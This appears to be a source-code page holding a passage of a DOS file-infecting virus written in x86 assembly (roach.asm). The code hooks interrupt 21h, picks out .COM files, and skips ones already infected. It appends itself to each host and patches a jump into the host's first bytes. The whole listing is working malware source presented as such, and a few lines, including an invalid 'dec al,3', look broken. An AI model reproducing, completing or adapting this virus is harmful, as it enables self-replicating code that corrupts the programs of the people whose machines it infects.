📄 roach.asm
字号:
go_virus_infect:
dec ah ;fix up before we exit
push ax ;\
push bx ; \
push cx ; \
push dx ; \
push si ; / save to the stack
push di ; / so the interrupt
push ds ; / will work on
push es ; / exit.
push bp ;/
call check_ext ;is it a com file
call open_host ;open the host file for r/w
call read_host_3 ;read the host first 3
call infect_host ;infect file
exit_host_infected:
call close_host ;close the host file
exit_virus_memory: ;ti we are here.
pop ax ;/
jmp exit_virus_tsr ;exit the virus tsr
;----- This checks the file ext --------------------------------------------
check_ext:
push dx
pop si ;get the source index
mov cx,0ffh ;search for a com file ext
find_ext:
mov al,byte ptr ds:[si] ;load the byte at ds:dx
cmp al,'.' ;is it a .
je found_ext ;found the ext
inc si ;inc the location
loop find_ext ;do it again
found_ext:
inc si ;inc the position
mov ax,word ptr ds:[si] ;load the byte ad ds:si
cmp ax,'OC' ;is it a com file
je found_com_file ;do a nother check
pop ax ;get off the stack
jmp exit_virus_memory ;not com file bail
found_com_file:
ret ;and return
;----- This opens a host file -----------------------------------------------
open_host:
mov ax,3d02h ;open file read write access
call fake_dos_function ;fake a dos interrupt
mov bx,ax ;move the handle into bx
ret ;and return
;----- This closes a host file ----------------------------------------------
close_host:
mov ah,3eh ;close a file
call fake_dos_function ;close the file
ret ;and return
;----- This reads the first 3 bytes from the host ---------------------------
read_host_3:
push ds ;save to the stack
push dx ;save to the stack
push cs ;push the code segment
pop ds ;get the tsr segment
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
push dx ;save to the stack
mov ah,3fh ;read from the host
mov cx,3 ;read 3 bytes of host
call fake_dos_function ;fake a dos call
pop si ;get si from the stack
mov ah,byte ptr ds:[si] ;load ah with the first byte
cmp ah,0e9h ;is it a jump instruction
je is_infect ;is the file infected
cmp ah,'M' ;does it have a MZ header
je is_infect ;the file is a command.com
pop dx ;get call from the stack
pop ds ;get call from the stack
ret ;and return
is_infect:
pop dx ;get from the stack
pop ds ;get call from the stack
pop ax ;get call from the stack
jmp exit_host_infected ;exit the host is infected
;----- This infects the host file -------------------------------------------
infect_host:
push ds ;save to the stack
push dx ;save to the stack
call lseek_end ;seek to the end of the host
push ax ;save the location
push cs ;push the code segment
pop ds ;get the virus segment
mov ah,40h ;time to write virus to end
mov cx,virus_len ;number of bytes to write
xor dx,dx ;at the start of the segment
call fake_dos_function ;fake a dos function
call lseek_start ;seek to the start
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
mov si,dx ;mov si the pointer
mov ah,0e9h ;mov jump instruction in ah
mov byte ptr ds:[si],ah ;write the jump in
pop ax ;get off the stack
dec al,3
mov word ptr ds:[si+1],ax ;write the address to buffer
mov dx,si ;write to dx the pointer
mov cx,3 ;number of bytes to write
mov ah,40h ;write to the host file
call fake_dos_function ;fake a dos function call
pop dx ;get off the stack
pop ds ;get off the stack
ret ;and return
;----- This seeks to the start or end of the host ---------------------------
lseek_end:
mov ax,4202h ;seek to the end
jmp lseek ;and do the seeking
lseek_start:
mov ax,4200h ;seek to the start
lseek:
xor dx,dx ;to start/end of host
xor cx,cx ;to start/end of host
call fake_dos_function ;fake a dos call
ret ;and return
;----- From here down is were all the data for virus is stored!! ------------
data1:
old_21h dd 0 ;old interrupt 21h function
host_3 db 3 dup(90h) ;original first 3 bytes
virus_end:
virus_len equ virus_end - virus_start ;len of the virus code
data_start equ data1 - virus_start ;starting address of data
new_21 equ new_21h - virus_start ;len from the start to int
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -